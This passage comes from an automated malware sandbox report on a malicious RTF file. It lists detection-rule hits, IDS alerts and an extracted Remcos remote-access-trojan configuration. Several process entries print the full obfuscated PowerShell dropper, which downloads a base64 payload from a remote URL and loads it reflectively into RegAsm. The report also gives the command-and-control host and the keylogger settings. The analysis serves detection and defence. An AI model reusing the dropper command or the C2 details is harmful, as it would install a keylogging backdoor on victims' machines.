'KCgnezJ9JysndXInKydsJysnID0geycrJzF9aHQnKyd0cCcrJ3M6Ly9yYScrJ3cuZ2knKyd0aCcrJ3VidXNlcmNvbnRlbnQuY29tL04nKydvRGV0ZWMnKyd0JysnT24vTm9EZXQnKydlY3RPJysnbicrJy8nKydyZWZzJysnL2hlYWQnKydzL21haW4vJysnRGV0JysnYWhOb3QnKydoJysnLScrJ1YudHh0ezEnKyd9OyAnKyd7Mn0nKydiYXNlNicrJzRDb250JysnZW50ICcrJz0nKycgKE4nKydlJysndy0nKydPYmonKydlY3QgU3lzdCcrJ2UnKydtLk4nKydldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLicrJ0RvJysnd24nKydsb2EnKydkU3QnKydyJysnaScrJ25nKCcrJ3syfXUnKydybCk7IHsyfWJpbmEnKydyeUNvbnRlbicrJ3QgJysnPSBbJysnUycrJ3lzdGVtJysnLkNvbnYnKydlcnRdOjpGJysncicrJ28nKydtJysnQ
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{2}'+'ur'+'l'+' = {'+'1}ht'+'tp'+'s://ra'+'w.gi'+'th'+'ubusercontent.com/N'+'oDetec'+'t'+'On/NoDet'+'ectO'+'n'+'/'+'refs'+'/head'+'s/main/'+'Det'+'ahNot'+'h'+'-'+'V.txt{1'+'}; '+'{2}'+'base6'+'4Cont'+'ent '+'='+' (N'+'e'+'w-'+'Obj'+'ect Syst'+'e'+'m.N'+'et.'+'We'+'bCli'+'e'+'nt'+').'+'Do'+'wn'+'loa'+'dSt'+'r'+'i'+'ng('+'{2}u'+'rl); {2}bina'+'ryConten'+'t '+'= ['+'S'+'ystem'+'.Conv'+'ert]::F'+'r'+'o'+'m'+'Base64Stri'+'ng'+'({2}bas'+'e64'+'Conte'+'nt);'+' '+'{2'+'}'+'a'+'ssemb'+'l'+'y'+' ='+' [Refl'+'e'+'ct'+'i'+'o'+'n.Assem'+'b'+'ly]'+'::Loa'+'d({'+'2}b'+'inaryCo'+'n'+'tent'+'); [dnli'+'b.'+'IO'+'.Ho'+'me]'+'::VAI({0}txt.E'+'C'+'CNN/04'+'2/741.03'+'1.'+'271.7'+'01//'+':ptth'+'{0}'+', {'+'0}d'+'es'+'ati'+'v'+'ado'+'{0}'+', {'+'0}desati'+'vado{0}, {'+'0}desa'+'ti'+'vad'+'o'+'{0}, {'+'0}R'+'e'+'g'+'A'+'sm{0}, {0}{0},'+'{0}{0})')-f[char]34,[char]39,[char]36) |. ( $PsHOMe[21]+$PSHOMe[30]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{2}'+'ur'+'l'+' = {'+'1}ht'+'tp'+'s://ra'+'w.gi'+'th'+'ubusercontent.com/N'+'oDetec'+'t'+'On/NoDet'+'ectO'+'n'+'/'+'refs'+'/head'+'s/main/'+'Det'+'ahNot'+'h'+'-'+'V.txt{1'+'}; '+'{2}'+'base6'+'4Cont'+'ent '+'='+' (N'+'e'+'w-'+'Obj'+'ect Syst'+'e'+'m.N'+'et.'+'We'+'bCli'+'e'+'nt'+').'+'Do'+'wn'+'loa'+'dSt'+'r'+'i'+'ng('+'{2}u'+'rl); {2}bina'+'ryConten'+'t '+'= ['+'S'+'ystem'+'.Conv'+'ert]::F'+'r'+'o'+'m'+'Base64Stri'+'ng'+'({2}bas'+'e64'+'Conte'+'nt);'+' '+'{2'+'}'+'a'+'ssemb'+'l'+'y'+' ='+' [Refl'+'e'+'ct'+'i'+'o'+'n.Assem'+'b'+'ly]'+'::Loa'+'d({'+'2}b'+'inaryCo'+'n'+'tent'+'); [dnli'+'b.'+'IO'+'.Ho'+'me]'+'::VAI({0}txt.E'+'C'+'CNN/04'+'2/741.03'+'1.'+'271.7'+'01//'+':ptth'+'{0}'+', {'+'0}d'+'es'+'ati'+'v'+'ado'+'{0}'+', {'+'0}desati'+'vado{0}, {'+'0}desa'+'ti'+'vad'+'o'+'{0}, {'+'0}R'+'e'+'g'+'A'+'sm{0}, {0}{0},'+'{0}{0})')-f[char]34,[char]39,[char]36) |. ( $PsHOMe[21]+$PSHOMe[30]+'X')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezJ9JysndXInKydsJysnID0geycrJzF9aHQnKyd0cCcrJ3M6Ly9yYScrJ3cuZ2knKyd0aCcrJ3VidXNlcmNvbnRlbnQuY29tL04nKydvRGV0ZWMnKyd0JysnT24vTm9EZXQnKydlY3RPJysnbicrJy8nKydyZWZzJysnL2hlYWQnKydzL21haW4vJysnRGV0JysnYWhOb3QnKydoJysnLScrJ1YudHh0ezEnKyd9OyAnKyd7Mn0nKydiYXNlNicrJzRDb250JysnZW50ICcrJz0nKycgKE4nKydlJysndy0nKydPYmonKydlY3QgU3lzdCcrJ2UnKydtLk4nKydldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLicrJ0RvJysnd24nKydsb2EnKydkU3QnKydyJysnaScrJ25nKCcrJ3syfXUnKydybCk7IHsyfWJpbmEnKydyeUNvbnRlbicrJ3QgJysnPSBbJysnUycrJ3lzdGVtJysnLkNvbnYnKydlcnRdOjpGJysncicrJ28nKydtJysnQ
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezJ9JysndXInKydsJysnID0geycrJzF9aHQnKyd0cCcrJ3M6Ly9yYScrJ3cuZ2knKyd0aCcrJ3VidXNlcmNvbnRlbnQuY29tL04nKydvRGV0ZWMnKyd0JysnT24vTm9EZXQnKydlY3RPJysnbicrJy8nKydyZWZzJysnL2hlYWQnKydzL21haW4vJysnRGV0JysnYWhOb3QnKydoJysnLScrJ1YudHh0ezEnKyd9OyAnKyd7Mn0nKydiYXNlNicrJzRDb250JysnZW50ICcrJz0nKycgKE4nKydlJysndy0nKydPYmonKydlY3QgU3lzdCcrJ2UnKydtLk4nKydldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLicrJ0RvJysnd24nKydsb2EnKydkU3QnKydyJysnaScrJ25nKCcrJ3syfXUnKydybCk7IHsyfWJpbmEnKydyeUNvbnRlbicrJ3QgJysnPSBbJysnUycrJ3lzdGVtJysnLkNvbnYnKydlcnRdOjpGJysncicrJ28nKydtJysnQmFzZTY0U3RyaScrJ25nJysnKHsyfWJhcycrJ2U2NCcrJ0NvbnRlJysnbnQpOycrJyAnKyd7MicrJ30nKydhJysnc3NlbWInKydsJysneScrJyA9JysnIFtSZWZsJysnZScrJ2N0JysnaScrJ28nKyduLkFzc2VtJysnYicrJ2x5XScrJzo6TG9hJysnZCh7JysnMn1iJysnaW5hcnlDbycrJ24nKyd0ZW50JysnKTsgW2RubGknKydiLicrJ0lPJysnLkhvJysnbWVdJysnOjpWQUkoezB9dHh0LkUnKydDJysnQ05OLzA0JysnMi83NDEuMDMnKycxLicrJzI3MS43JysnMDEvLycrJzpwdHRoJysnezB9JysnLCB7JysnMH1kJysnZXMnKydhdGknKyd2JysnYWRvJysnezB9JysnLCB7JysnMH1kZXNhdGknKyd2YWRvezB9LCB7JysnMH1kZXNhJysndGknKyd2YWQnKydvJysnezB9LCB7JysnMH1SJysnZScrJ2cnKydBJysnc217MH0sIHswfXswfSwnKyd7MH17MH0pJyktZltjaGFyXTM0LFtjaGFyXTM5LFtjaGFyXTM2KSB8LiAoICRQc0hPTWVbMjFdKyRQU0hPTWVbMzBdKydYJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezJ9JysndXInKydsJysnID0geycrJzF9aHQnKyd0cCcrJ3M6Ly9yYScrJ3cuZ2knKyd0aCcrJ3VidXNlcmNvbnRlbnQuY29tL04nKydvRGV0ZWMnKyd0JysnT24vTm9EZXQnKydlY3RPJysnbicrJy8nKydyZWZzJysnL2hlYWQnKydzL21haW4vJysnRGV0JysnYWhOb3QnKydoJysnLScrJ1YudHh0ezEnKyd9OyAnKyd7Mn0nKydiYXNlNicrJzRDb250JysnZW50ICcrJz0nKycgKE4nKydlJysndy0nKydPYmonKydlY3QgU3lzdCcrJ2UnKydtLk4nKydldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLicrJ0RvJysnd24nKydsb2EnKydkU3QnKydyJysnaScrJ25nKCcrJ3syfXUnKydybCk7IHsyfWJpbmEnKydyeUNvbnRlbicrJ3QgJysnPSBbJysnUycrJ3lzdGVtJysnLkNvbnYnKydlcnRdOjpGJysncicrJ28nKydtJysnQmFzZTY0U3RyaScrJ25nJysnKHsyfWJhcycrJ2U2NCcrJ0NvbnRlJysnbnQpOycrJyAnKyd7MicrJ30nKydhJysnc3NlbWInKydsJysneScrJyA9JysnIFtSZWZsJysnZScrJ2N0JysnaScrJ28nKyduLkFzc2VtJysnYicrJ2x5XScrJzo6TG9hJysnZCh7JysnMn1iJysnaW5hcnlDbycrJ24nKyd0ZW50JysnKTsgW2RubGknKydiLicrJ0lPJysnLkhvJysnbWVdJysnOjpWQUkoezB9dHh0LkUnKydDJysnQ05OLzA0JysnMi83NDEuMDMnKycxLicrJzI3MS43JysnMDEvLycrJzpwdHRoJysnezB9JysnLCB7JysnMH1kJysnZXMnKydhdGknKyd2JysnYWRvJysnezB9JysnLCB7JysnMH1kZXNhdGknKyd2YWRvezB9LCB7JysnMH1kZXNhJysndGknKyd2YWQnKydvJysnezB9LCB7JysnMH1SJysnZScrJ2cnKydBJysnc217MH0sIHswfXswfSwnKyd7MH17MH0pJyktZltjaGFyXTM0LFtjaGFyXTM5LFtjaGFyXTM2KSB8LiAoICRQc0hPTWVbMjFdKyRQU0hPTWVbMzBdKydYJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains:
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicepciturewithggreatethingstob.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicepciturewithggreatethingstob.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3368, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicepciturewithggreatethingstob.vBS" , ProcessId: 3536, ProcessName: wscript.exe
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicepciturewithggreatethingstob.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicepciturewithggreatethingstob.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3368, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicepciturewithggreatethingstob.vBS" , ProcessId: 3536, ProcessName: wscript.exe
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezJ9JysndXInKydsJysnID0geycrJzF9aHQnKyd0cCcrJ3M6Ly9yYScrJ3cuZ2knKyd0aCcrJ3VidXNlcmNvbnRlbnQuY29tL04nKydvRGV0ZWMnKyd0JysnT24vTm9EZXQnKydlY3RPJysnbicrJy8nKydyZWZzJysnL2hlYWQnKydzL21haW4vJysnRGV0JysnYWhOb3QnKydoJysnLScrJ1YudHh0ezEnKyd9OyAnKyd7Mn0nKydiYXNlNicrJzRDb250JysnZW50ICcrJz0nKycgKE4nKydlJysndy0nKydPYmonKydlY3QgU3lzdCcrJ2UnKydtLk4nKydldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLicrJ0RvJysnd24nKydsb2EnKydkU3QnKydyJysnaScrJ25nKCcrJ3syfXUnKydybCk7IHsyfWJpbmEnKydyeUNvbnRlbicrJ3QgJysnPSBbJysnUycrJ3lzdGVtJysnLkNvbnYnKydlcnRdOjpGJysncicrJ28nKydtJysnQmFzZTY0U3RyaScrJ25nJysnKHsyfWJhcycrJ2U2NCcrJ0NvbnRlJysnbnQpOycrJyAnKyd7MicrJ30nKydhJysnc3NlbWInKydsJysneScrJyA9JysnIFtSZWZsJysnZScrJ2N0JysnaScrJ28nKyduLkFzc2VtJysnYicrJ2x5XScrJzo6TG9hJysnZCh7JysnMn1iJysnaW5hcnlDbycrJ24nKyd0ZW50JysnKTsgW2RubGknKydiLicrJ0lPJysnLkhvJysnbWVdJysnOjpWQUkoezB9dHh0LkUnKydDJysnQ05OLzA0JysnMi83NDEuMDMnKycxLicrJzI3MS43JysnMDEvLycrJzpwdHRoJysnezB9JysnLCB7JysnMH1kJysnZXMnKydhdGknKyd2JysnYWRvJysnezB9JysnLCB7JysnMH1kZXNhdGknKyd2YWRvezB9LCB7JysnMH1kZXNhJysndGknKyd2YWQnKydvJysnezB9LCB7JysnMH1SJysnZScrJ2cnKydBJysnc217MH0sIHswfXswfSwnKyd7MH17MH0pJyktZltjaGFyXTM0LFtjaGFyXTM5LFtjaGFyXTM2KSB8LiAoICRQc0hPTWVbMjFdKyRQU0hPTWVbMzBdKydYJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezJ9JysndXInKydsJysnID0geycrJzF9aHQnKyd0cCcrJ3M6Ly9yYScrJ3cuZ2knKyd0aCcrJ3VidXNlcmNvbnRlbnQuY29tL04nKydvRGV0ZWMnKyd0JysnT24vTm9EZXQnKydlY3RPJysnbicrJy8nKydyZWZzJysnL2hlYWQnKydzL21haW4vJysnRGV0JysnYWhOb3QnKydoJysnLScrJ1YudHh0ezEnKyd9OyAnKyd7Mn0nKydiYXNlNicrJzRDb250JysnZW50ICcrJz0nKycgKE4nKydlJysndy0nKydPYmonKydlY3QgU3lzdCcrJ2UnKydtLk4nKydldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLicrJ0RvJysnd24nKydsb2EnKydkU3QnKydyJysnaScrJ25nKCcrJ3syfXUnKydybCk7IHsyfWJpbmEnKydyeUNvbnRlbicrJ3QgJysnPSBbJysnUycrJ3lzdGVtJysnLkNvbnYnKydlcnRdOjpGJysncicrJ28nKydtJysnQmFzZTY0U3RyaScrJ25nJysnKHsyfWJhcycrJ2U2NCcrJ0NvbnRlJysnbnQpOycrJyAnKyd7MicrJ30nKydhJysnc3NlbWInKydsJysneScrJyA9JysnIFtSZWZsJysnZScrJ2N0JysnaScrJ28nKyduLkFzc2VtJysnYicrJ2x5XScrJzo6TG9hJysnZCh7JysnMn1iJysnaW5hcnlDbycrJ24nKyd0ZW50JysnKTsgW2RubGknKydiLicrJ0lPJysnLkhvJysnbWVdJysnOjpWQUkoezB9dHh0LkUnKydDJysnQ05OLzA0JysnMi83NDEuMDMnKycxLicrJzI3MS43JysnMDEvLycrJzpwdHRoJysnezB9JysnLCB7JysnMH1kJysnZXMnKydhdGknKyd2JysnYWRvJysnezB9JysnLCB7JysnMH1kZXNhdGknKyd2YWRvezB9LCB7JysnMH1kZXNhJysndGknKyd2YWQnKydvJysnezB9LCB7JysnMH1SJysnZScrJ2cnKydBJysnc217MH0sIHswfXswfSwnKyd7MH17MH0pJyktZltjaGFyXTM0LFtjaGFyXTM5LFtjaGFyXTM2KSB8LiAoICRQc0hPTWVbMjFdKyRQU0hPTWVbMzBdKydYJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains:
                    Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\vzdom", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\vzdom", CommandLine|base64offset|contains: ^, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ParentProcessId: 3816, ParentProcessName: RegAsm.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\vzdom", ProcessId: 3956, ProcessName: RegAsm.exe
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicepciturewithggreatethingstob.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicepciturewithggreatethingstob.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3368, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicepciturewithggreatethingstob.vBS" , ProcessId: 3536, ProcessName: wscript.exe
                    Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3368, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezJ9JysndXInKydsJysnID0geycrJzF9aHQnKyd0cCcrJ3M6Ly9yYScrJ3cuZ2knKyd0aCcrJ3VidXNlcmNvbnRlbnQuY29tL04nKydvRGV0ZWMnKyd0JysnT24vTm9EZXQnKydlY3RPJysnbicrJy8nKydyZWZzJysnL2hlYWQnKydzL21haW4vJysnRGV0JysnYWhOb3QnKydoJysnLScrJ1YudHh0ezEnKyd9OyAnKyd7Mn0nKydiYXNlNicrJzRDb250JysnZW50ICcrJz0nKycgKE4nKydlJysndy0nKydPYmonKydlY3QgU3lzdCcrJ2UnKydtLk4nKydldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLicrJ0RvJysnd24nKydsb2EnKydkU3QnKydyJysnaScrJ25nKCcrJ3syfXUnKydybCk7IHsyfWJpbmEnKydyeUNvbnRlbicrJ3QgJysnPSBbJysnUycrJ3lzdGVtJysnLkNvbnYnKydlcnRdOjpGJysncicrJ28nKydtJysnQmFzZTY0U3RyaScrJ25nJysnKHsyfWJhcycrJ2U2NCcrJ0NvbnRlJysnbnQpOycrJyAnKyd7MicrJ30nKydhJysnc3NlbWInKydsJysneScrJyA9JysnIFtSZWZsJysnZScrJ2N0JysnaScrJ28nKyduLkFzc2VtJysnYicrJ2x5XScrJzo6TG9hJysnZCh7JysnMn1iJysnaW5hcnlDbycrJ24nKyd0ZW50JysnKTsgW2RubGknKydiLicrJ0lPJysnLkhvJysnbWVdJysnOjpWQUkoezB9dHh0LkUnKydDJysnQ05OLzA0JysnMi83NDEuMDMnKycxLicrJzI3MS43JysnMDEvLycrJzpwdHRoJysnezB9JysnLCB7JysnMH1kJysnZXMnKydhdGknKyd2JysnYWRvJysnezB9JysnLCB7JysnMH1kZXNhdGknKyd2YWRvezB9LCB7JysnMH1kZXNhJysndGknKyd2YWQnKydvJysnezB9LCB7JysnMH1SJysnZScrJ2cnKydBJysnc217MH0sIHswfXswfSwnKyd7MH17MH0pJyktZltjaGFyXTM0LFtjaGFyXTM5LFtjaGFyXTM2KSB8LiAoICRQc0hPTWVbMjFdKyRQU0hPTWVbMzBdKydYJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezJ9JysndXInKydsJysnID0geycrJzF9aHQnKyd0cCcrJ3M6Ly9yYScrJ3cuZ2knKyd0aCcrJ3VidXNlcmNvbnRlbnQuY29tL04nKydvRGV0ZWMnKyd0JysnT24vTm9EZXQnKydlY3RPJysnbicrJy8nKydyZWZzJysnL2hlYWQnKydzL21haW4vJysnRGV0JysnYWhOb3QnKydoJysnLScrJ1YudHh0ezEnKyd9OyAnKyd7Mn0nKydiYXNlNicrJzRDb250JysnZW50ICcrJz0nKycgKE4nKydlJysndy0nKydPYmonKydlY3QgU3lzdCcrJ2UnKydtLk4nKydldC4nKydXZScrJ2JDbGknKydlJysnbnQnKycpLicrJ0RvJysnd24nKydsb2EnKydkU3QnKydyJysnaScrJ25nKCcrJ3syfXUnKydybCk7IHsyfWJpbmEnKydyeUNvbnRlbicrJ3QgJysnPSBbJysnUycrJ3lzdGVtJysnLkNvbnYnKydlcnRdOjpGJysncicrJ28nKydtJysnQmFzZTY0U3RyaScrJ25nJysnKHsyfWJhcycrJ2U2NCcrJ0NvbnRlJysnbnQpOycrJyAnKyd7MicrJ30nKydhJysnc3NlbWInKydsJysneScrJyA9JysnIFtSZWZsJysnZScrJ2N0JysnaScrJ28nKyduLkFzc2VtJysnYicrJ2x5XScrJzo6TG9hJysnZCh7JysnMn1iJysnaW5hcnlDbycrJ24nKyd0ZW50JysnKTsgW2RubGknKydiLicrJ0lPJysnLkhvJysnbWVdJysnOjpWQUkoezB9dHh0LkUnKydDJysnQ05OLzA0JysnMi83NDEuMDMnKycxLicrJzI3MS43JysnMDEvLycrJzpwdHRoJysnezB9JysnLCB7JysnMH1kJysnZXMnKydhdGknKyd2JysnYWRvJysnezB9JysnLCB7JysnMH1kZXNhdGknKyd2YWRvezB9LCB7JysnMH1kZXNhJysndGknKyd2YWQnKydvJysnezB9LCB7JysnMH1SJysnZScrJ2cnKydBJysnc217MH0sIHswfXswfSwnKyd7MH17MH0pJyktZltjaGFyXTM0LFtjaGFyXTM5LFtjaGFyXTM2KSB8LiAoICRQc0hPTWVbMjFdKyRQU0hPTWVbMzBdKydYJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains:
                    Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3284, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3580, TargetFilename: C:\Users\user\AppData\Local\Temp\ehv5srtl.z4z.ps1

                    Stealing of Sensitive Information

                    barindex
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3816, TargetFilename: C:\ProgramData\remcos\logs.dat
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-05T14:52:57.616787+020020204231Exploit Kit Activity Detected107.172.130.14780192.168.2.2249163TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-05T14:52:57.616787+020020204251Exploit Kit Activity Detected107.172.130.14780192.168.2.2249163TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-05T14:52:59.307763+020020365941Malware Command and Control Activity Detected192.168.2.2249164185.236.203.10151525TCP
                    2024-10-05T14:53:01.077713+020020365941Malware Command and Control Activity Detected192.168.2.2249165185.236.203.10151525TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-05T14:53:00.948333+020028033043Unknown Traffic192.168.2.2249166178.237.33.5080TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 00000009.00000002.873637791.00000000004E1000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "dumboi.duckdns.org:51525:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-8AXK3L", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                    Source: DSpWOKW7zn.rtfReversingLabs: Detection: 57%
                    Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.powershell.exe.6b080d8.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.powershell.exe.6b080d8.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000002.873764967.000000000051C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.874039059.000000000231E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.873637791.00000000004E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.873637791.00000000004C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.873424505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.370382031.0000000003539000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.374107971.00000000066A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3696, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3816, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
